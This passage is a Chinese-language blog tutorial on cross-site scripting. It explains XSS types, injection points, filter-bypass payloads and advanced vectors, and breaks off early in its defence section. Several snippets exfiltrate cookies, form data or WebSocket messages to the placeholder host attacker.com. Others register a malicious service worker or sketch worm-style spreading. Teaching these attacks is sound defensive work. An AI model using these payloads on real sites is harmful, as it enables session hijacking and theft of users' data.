{"id":66258,"date":"2026-01-26T14:17:31","date_gmt":"2026-01-26T06:17:31","guid":{"rendered":"https:\/\/www.wsisp.com\/helps\/66258.html"},"modified":"2026-01-26T14:17:31","modified_gmt":"2026-01-26T06:17:31","slug":"web%e5%ae%89%e5%85%a8%e5%bf%85%e7%9f%a5%ef%bd%9cxss%e6%94%bb%e5%87%bb%e8%af%a6%e8%a7%a3%ef%bc%9a%e4%bb%8e%e6%bc%8f%e6%b4%9e%e6%8c%96%e6%8e%98%e5%88%b0%e9%98%b2%e6%8a%a4%e5%ae%9e%e6%88%98%ef%bc%8c","status":"publish","type":"post","link":"https:\/\/www.wsisp.com\/helps\/66258.html","title":{"rendered":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86"},"content":{"rendered":"<h2>XSS\u653b\u51fb\u8be6\u89e3<\/h2>\n<h3>1. XSS\u653b\u51fb\u6982\u8ff0<\/h3>\n<p>XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002<\/p>\n<h4>\u5173\u952e\u7279\u5f81&#xff1a;<\/h4>\n<ul>\n<li>\u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d<\/li>\n<li>\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb<\/li>\n<li>\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236&#xff08;\u811a\u672c\u5728\u53ef\u4fe1\u7f51\u7ad9\u7684\u6e90\u5185\u6267\u884c&#xff0c;\u56e0\u6b64\u4e0d\u53d7SOP\u9650\u5236&#xff09;<\/li>\n<li>\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Cookie\u3001\u4f1a\u8bdd\u52ab\u6301\u3001\u9493\u9c7c\u653b\u51fb\u7b49<\/li>\n<\/ul>\n<h3>2. 
XSS\u653b\u51fb\u7c7b\u578b<\/h3>\n<h4>2.1 \u53cd\u5c04\u578bXSS&#xff08;Reflected XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6076\u610f\u811a\u672c\u4f5c\u4e3a\u8bf7\u6c42\u7684\u4e00\u90e8\u5206\u53d1\u9001&#xff0c;\u670d\u52a1\u5668\u7acb\u5373\u5728\u54cd\u5e94\u4e2d\u8fd4\u56de\u5e76\u6267\u884c<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u6784\u9020\u5305\u542b\u6076\u610f\u811a\u672c\u7684URL<\/li>\n<li>\u8bf1\u4f7f\u7528\u6237\u70b9\u51fb\u8be5URL<\/li>\n<li>\u670d\u52a1\u5668\u672a\u8fc7\u6ee4\u76f4\u63a5\u5c06\u811a\u672c\u8fd4\u56de<\/li>\n<li>\u7528\u6237\u6d4f\u89c8\u5668\u6267\u884c\u6076\u610f\u811a\u672c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p>http:\/\/vulnerable-site.com\/search?q&#061;&lt;script&gt;alert(&#039;XSS&#039;)&lt;\/script&gt;<\/p>\n<h4>2.2 \u5b58\u50a8\u578bXSS&#xff08;Stored XSS \/ Persistent XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6076\u610f\u811a\u672c\u88ab\u6c38\u4e45\u5b58\u50a8\u5728\u76ee\u6807\u670d\u52a1\u5668\u4e0a&#xff08;\u6570\u636e\u5e93\u3001\u6587\u4ef6\u7b49&#xff09;<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u5c06\u6076\u610f\u811a\u672c\u63d0\u4ea4\u5230\u7f51\u7ad9&#xff08;\u5982\u8bc4\u8bba\u3001\u8bba\u575b\u5e16\u5b50&#xff09;<\/li>\n<li>\u811a\u672c\u88ab\u5b58\u50a8\u5728\u670d\u52a1\u5668\u6570\u636e\u5e93\u4e2d<\/li>\n<li>\u5176\u4ed6\u7528\u6237\u8bbf\u95ee\u5305\u542b\u8be5\u5185\u5bb9\u7684\u9875\u9762<\/li>\n<li>\u6076\u610f\u811a\u672c\u81ea\u52a8\u52a0\u8f7d\u5e76\u6267\u884c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u653b\u51fb\u8005\u5728\u8bc4\u8bba\u4e2d\u63d2\u5165 &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>script<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token script\"><span class=\"token language-javascript\"><br \/>\n  <span class=\"token keyword\">var<\/span> img <span class=\"token 
operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">Image<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  img<span class=\"token punctuation\">.<\/span>src <span class=\"token operator\">&#061;<\/span> <span class=\"token string\">&#039;http:\/\/attacker.com\/steal?cookie&#061;&#039;<\/span> <span class=\"token operator\">&#043;<\/span> document<span class=\"token punctuation\">.<\/span>cookie<span class=\"token punctuation\">;<\/span><br \/>\n<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>script<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h4>2.3 DOM\u578bXSS&#xff08;DOM-based XSS&#xff09;<\/h4>\n<p>\u7279\u70b9&#xff1a;\u6f0f\u6d1e\u5b58\u5728\u4e8e\u5ba2\u6237\u7aef\u4ee3\u7801\u4e2d&#xff0c;\u4e0d\u6d89\u53ca\u670d\u52a1\u5668\u54cd\u5e94<\/p>\n<p>\u653b\u51fb\u6d41\u7a0b&#xff1a;<\/p>\n<li>\u653b\u51fb\u8005\u6784\u9020\u7279\u6b8aURL<\/li>\n<li>\u7528\u6237\u8bbf\u95ee\u8be5URL<\/li>\n<li>\u5ba2\u6237\u7aefJavaScript\u8bfb\u53d6URL\u53c2\u6570\u5e76\u52a8\u6001\u66f4\u65b0DOM<\/li>\n<li>\u6076\u610f\u811a\u672c\u88ab\u6267\u884c<\/li>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">\/\/ \u6f0f\u6d1e\u4ee3\u7801<\/span><br \/>\n<span class=\"token keyword\">var<\/span> hash <span class=\"token operator\">&#061;<\/span> window<span class=\"token punctuation\">.<\/span>location<span class=\"token punctuation\">.<\/span>hash<span class=\"token punctuation\">.<\/span><span class=\"token function\">substring<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span><span class=\"token function\">getElementById<\/span><span class=\"token 
punctuation\">(<\/span><span class=\"token string\">&#034;content&#034;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span>innerHTML <span class=\"token operator\">&#061;<\/span> hash<span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u653b\u51fbURL<\/span><br \/>\n<span class=\"token literal-property property\">http<\/span><span class=\"token operator\">:<\/span><span class=\"token operator\">\/<\/span><span class=\"token operator\">\/<\/span>site<span class=\"token punctuation\">.<\/span>com<span class=\"token operator\">\/<\/span>page#<span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;XSS&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><\/p>\n<h3>3. 
XSS\u653b\u51fb\u6280\u672f\u7ec6\u8282<\/h3>\n<h4>3.1 \u6ce8\u5165\u70b9<\/h4>\n<ul>\n<li>HTML\u5143\u7d20\u5185\u5bb9&#xff1a;&lt;div&gt;\u7528\u6237\u8f93\u5165&lt;\/div&gt;<\/li>\n<li>HTML\u5c5e\u6027\u503c&#xff1a;&lt;input value&#061;&#034;\u7528\u6237\u8f93\u5165&#034;&gt;<\/li>\n<li>JavaScript\u4ee3\u7801&#xff1a;&lt;script&gt;var x &#061; &#039;\u7528\u6237\u8f93\u5165&#039;;&lt;\/script&gt;<\/li>\n<li>CSS\u6837\u5f0f&#xff1a;&lt;style&gt;\u7528\u6237\u8f93\u5165&lt;\/style&gt;<\/li>\n<li>URL\u53c2\u6570&#xff1a;&lt;a href&#061;&#034;\u7528\u6237\u8f93\u5165&#034;&gt;\u94fe\u63a5&lt;\/a&gt;<\/li>\n<\/ul>\n<h4>3.2 \u7ed5\u8fc7\u8fc7\u6ee4\u7684\u6280\u672f<\/h4>\n<h5>HTML\u5b9e\u4f53\u7f16\u7801\u7ed5\u8fc7<\/h5>\n<p><span class=\"token comment\">\/\/ \u4f7f\u7528HTML\u5b9e\u4f53\u7f16\u7801<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span> \u2192 <span class=\"token operator\">&amp;<\/span>lt<span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token operator\">&gt;<\/span> \u2192 <span class=\"token operator\">&amp;<\/span>gt<span class=\"token punctuation\">;<\/span><br \/>\n&#034; \u2192 <span class=\"token operator\">&amp;<\/span>quot<span class=\"token punctuation\">;<\/span><br \/>\n&#039; \u2192 <span class=\"token operator\">&amp;<\/span>#x27<span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u7ed5\u8fc7\u65b9\u6cd5&#xff1a;\u4f7f\u7528\u672a\u7f16\u7801\u7684\u53d8\u4f53<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>img src<span class=\"token operator\">&#061;<\/span>x onerror<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h5>JavaScript\u7f16\u7801\u7ed5\u8fc7<\/h5>\n<p><span class=\"token comment\">\/\/ 
\u4f7f\u7528Unicode\u3001\u5341\u516d\u8fdb\u5236\u7f16\u7801<\/span><br \/>\n<span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;XSS&#039;<\/span><span class=\"token punctuation\">)<\/span> \u2192 \\\\u0061\\\\u006c\\\\u0065\\\\u0072\\\\<span class=\"token function\">u0074<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;\\\\u0058\\\\u0053\\\\u0053&#039;<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<h5>\u4e8b\u4ef6\u5904\u7406\u5668\u5229\u7528<\/h5>\n<p><span class=\"token comment\">&lt;!&#8211; \u591a\u79cd\u4e8b\u4ef6\u89e6\u53d1\u65b9\u5f0f &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>body<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onload<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>img<\/span> <span class=\"token attr-name\">src<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span>x<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onerror<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token 
punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>svg<\/span> <span class=\"token special-attr\"><span class=\"token attr-name\">onload<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token value javascript language-javascript\"><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/span><\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h5>\u4f2a\u534f\u8bae\u5229\u7528<\/h5>\n<p><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>a<\/span> <span class=\"token attr-name\">href<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token punctuation\">&#034;<\/span>javascript:alert(1)<span class=\"token punctuation\">&#034;<\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span>\u70b9\u51fb<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>a<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>iframe<\/span> <span class=\"token attr-name\">src<\/span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">&#061;<\/span><span class=\"token punctuation\">&#034;<\/span>javascript:alert(1)<span class=\"token punctuation\">&#034;<\/span><\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h3>4. 
\u9ad8\u7ea7XSS\u653b\u51fb\u6280\u672f<\/h3>\n<h4>4.1 \u57fa\u4e8eFlash\u7684XSS<\/h4>\n<p>\/\/ Flash\u4e2d\u7684\u6f0f\u6d1e\u5229\u7528<br \/>\ngetURL(&#034;javascript:alert(&#039;XSS&#039;)&#034;);<br \/>\nloadMovie(&#034;javascript:alert(&#039;XSS&#039;)&#034;);<\/p>\n<h4>4.2 mXSS&#xff08;\u7a81\u53d8XSS&#xff09;<\/h4>\n<p>\u539f\u7406&#xff1a;\u6d4f\u89c8\u5668HTML\u89e3\u6790\u5668\u4e0eDOM\u89e3\u6790\u5668\u4e4b\u95f4\u7684\u4e0d\u4e00\u81f4\u6027<\/p>\n<p>\u793a\u4f8b&#xff1a;<\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u539f\u59cb\u4ee3\u7801 &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token style\"><span class=\"token language-css\">&lt;img src&#061;x onerror&#061;<span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span>1<span class=\"token punctuation\">)<\/span>&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<p><span class=\"token comment\">&lt;!&#8211; \u89e3\u6790\u540e &#8211;&gt;<\/span><br \/>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token style\"><span class=\"token language-css\">&lt;img 
src&#061;<span class=\"token string\">&#034;x&#034;<\/span> onerror&#061;<span class=\"token string\">&#034;alert(1)&#034;<\/span>&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>style<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;\/<\/span>div<\/span><span class=\"token punctuation\">&gt;<\/span><\/span><\/p>\n<h4>4.3 \u76f2\u6ce8XSS<\/h4>\n<p>\u7279\u70b9&#xff1a;\u653b\u51fb\u8005\u65e0\u6cd5\u76f4\u63a5\u770b\u5230\u6267\u884c\u7ed3\u679c&#xff0c;\u9700\u8981\u901a\u8fc7\u5916\u90e8\u901a\u4fe1\u786e\u8ba4<\/p>\n<p>\u5229\u7528\u65b9\u5f0f&#xff1a;<\/p>\n<p><span class=\"token comment\">\/\/ \u53d1\u9001\u8bf7\u6c42\u5230\u653b\u51fb\u8005\u63a7\u5236\u7684\u670d\u52a1\u5668<\/span><br \/>\n<span class=\"token keyword\">var<\/span> xhr <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">XMLHttpRequest<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nxhr<span class=\"token punctuation\">.<\/span><span class=\"token function\">open<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;GET&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string\">&#039;http:\/\/attacker.com\/log?data&#061;&#039;<\/span> <span class=\"token operator\">&#043;<\/span> document<span class=\"token punctuation\">.<\/span>cookie<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nxhr<span class=\"token punctuation\">.<\/span><span class=\"token function\">send<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>5. 
XSS\u653b\u51fb\u94fe\u5206\u6790<\/h3>\n<h4>5.1 \u4fe1\u606f\u6536\u96c6\u9636\u6bb5<\/h4>\n<p><span class=\"token comment\">\/\/ \u83b7\u53d6\u654f\u611f\u4fe1\u606f<\/span><br \/>\n<span class=\"token comment\">\/\/ Cookie\u7a83\u53d6<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span>cookie<\/p>\n<p><span class=\"token comment\">\/\/ \u672c\u5730\u5b58\u50a8<\/span><br \/>\nlocalStorage<span class=\"token punctuation\">.<\/span><span class=\"token function\">getItem<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;token&#039;<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u5c4f\u5e55\u622a\u56fe&#xff08;\u9700\u914d\u5408\u5176\u4ed6\u6f0f\u6d1e&#xff09;<\/span><br \/>\n<span class=\"token comment\">\/\/ \u8868\u5355\u6570\u636e\u6355\u83b7<\/span><br \/>\ndocument<span class=\"token punctuation\">.<\/span>forms<span class=\"token punctuation\">[<\/span><span class=\"token number\">0<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">addEventListener<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;submit&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">e<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">var<\/span> data <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">FormData<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">this<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u53d1\u9001\u5230\u653b\u51fb\u8005\u670d\u52a1\u5668<\/span><br \/>\n<span 
class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h4>5.2 \u6301\u4e45\u5316\u6280\u672f<\/h4>\n<p><span class=\"token comment\">\/\/ \u81ea\u6211\u590d\u5236\u5230\u5176\u4ed6\u4f4d\u7f6e<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token operator\">!<\/span>window<span class=\"token punctuation\">.<\/span><span class=\"token function\">hasOwnProperty<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;xss_payload&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  window<span class=\"token punctuation\">.<\/span>xss_payload <span class=\"token operator\">&#061;<\/span> <span class=\"token boolean\">true<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u6ce8\u5165\u5230\u5176\u4ed6\u53ef\u7f16\u8f91\u533a\u57df<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u4fee\u6539\u73b0\u6709\u811a\u672c<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u521b\u5efa\u9690\u85cfiframe<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>5.3 \u6a2a\u5411\u79fb\u52a8<\/h4>\n<p><span class=\"token comment\">\/\/ \u81ea\u52a8\u53d1\u9001\u6076\u610f\u6d88\u606f<\/span><br \/>\n<span class=\"token keyword\">function<\/span> <span class=\"token function\">spreadXSS<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u67e5\u627e\u597d\u53cb\u5217\u8868<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u81ea\u52a8\u53d1\u9001\u5305\u542bXSS\u7684\u6d88\u606f<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u5229\u7528CSRF\u8fdb\u884c\u4f20\u64ad<\/span><br \/>\n<span class=\"token 
punctuation\">}<\/span><\/p>\n<h3>6. \u73b0\u4ee3XSS\u653b\u51fb\u5411\u91cf<\/h3>\n<h4>6.1 \u57fa\u4e8eWebSocket\u7684XSS<\/h4>\n<p><span class=\"token comment\">\/\/ WebSocket\u8fde\u63a5\u7a83\u53d6<\/span><br \/>\n<span class=\"token keyword\">var<\/span> ws <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">WebSocket<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;ws:\/\/vulnerable-site.com\/chat&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\nws<span class=\"token punctuation\">.<\/span><span class=\"token function-variable function\">onmessage<\/span> <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">event<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u5c06\u6d88\u606f\u8f6c\u53d1\u5230\u653b\u51fb\u8005\u670d\u52a1\u5668<\/span><br \/>\n  <span class=\"token function\">fetch<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;http:\/\/attacker.com\/log&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token literal-property property\">method<\/span><span class=\"token operator\">:<\/span> <span class=\"token string\">&#039;POST&#039;<\/span><span class=\"token punctuation\">,<\/span><br \/>\n    <span class=\"token literal-property property\">body<\/span><span class=\"token operator\">:<\/span> event<span class=\"token punctuation\">.<\/span>data<br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><span class=\"token 
punctuation\">;<\/span><\/p>\n<h4>6.2 Service Worker\u52ab\u6301<\/h4>\n<p><span class=\"token comment\">\/\/ \u6ce8\u518c\u6076\u610fService Worker<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;serviceWorker&#039;<\/span> <span class=\"token keyword\">in<\/span> navigator<span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  navigator<span class=\"token punctuation\">.<\/span>serviceWorker<span class=\"token punctuation\">.<\/span><span class=\"token function\">register<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;malicious-sw.js&#039;<\/span><span class=\"token punctuation\">)<\/span><br \/>\n    <span class=\"token punctuation\">.<\/span><span class=\"token function\">then<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">registration<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n      console<span class=\"token punctuation\">.<\/span><span class=\"token function\">log<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;Service Worker\u6ce8\u518c\u6210\u529f&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n    <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>6.3 \u57fa\u4e8eWebRTC\u7684XSS<\/h4>\n<p><span class=\"token comment\">\/\/ \u901a\u8fc7WebRTC\u6cc4\u9732\u5185\u90e8IP<\/span><br \/>\n<span class=\"token keyword\">var<\/span> pc <span class=\"token operator\">&#061;<\/span> <span class=\"token keyword\">new<\/span> <span class=\"token class-name\">RTCPeerConnection<\/span><span 
class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\npc<span class=\"token punctuation\">.<\/span><span class=\"token function\">createOffer<\/span><span class=\"token punctuation\">(<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">then<\/span><span class=\"token punctuation\">(<\/span><span class=\"token keyword\">function<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">offer<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token comment\">\/\/ \u89e3\u6790SDP\u83b7\u53d6\u5185\u90e8IP<\/span><br \/>\n  <span class=\"token keyword\">var<\/span> internalIP <span class=\"token operator\">&#061;<\/span> <span class=\"token regex\"><span class=\"token regex-delimiter\">\/<\/span><span class=\"token regex-source language-regex\">([0-9]{1,3}(\\\\.[0-9]{1,3}){3})<\/span><span class=\"token regex-delimiter\">\/<\/span><\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">exec<\/span><span class=\"token punctuation\">(<\/span>offer<span class=\"token punctuation\">.<\/span>sdp<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">[<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">;<\/span><br \/>\n  <span class=\"token function\">exfiltrate<\/span><span class=\"token punctuation\">(<\/span>internalIP<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>7. 
\u9632\u5fa1\u63aa\u65bd<\/h3>\n<h4>7.1 \u8f93\u5165\u9a8c\u8bc1\u4e0e\u8fc7\u6ee4<\/h4>\n<p><span class=\"token comment\">\/\/ \u767d\u540d\u5355\u8fc7\u6ee4\u793a\u4f8b<\/span><br \/>\n<span class=\"token keyword\">function<\/span> <span class=\"token function\">sanitizeHTML<\/span><span class=\"token punctuation\">(<\/span><span class=\"token parameter\">str<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">const<\/span> allowedTags <span class=\"token operator\">&#061;<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token string-property property\">&#039;b&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;i&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;u&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;em&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token string-property property\">&#039;strong&#039;<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token 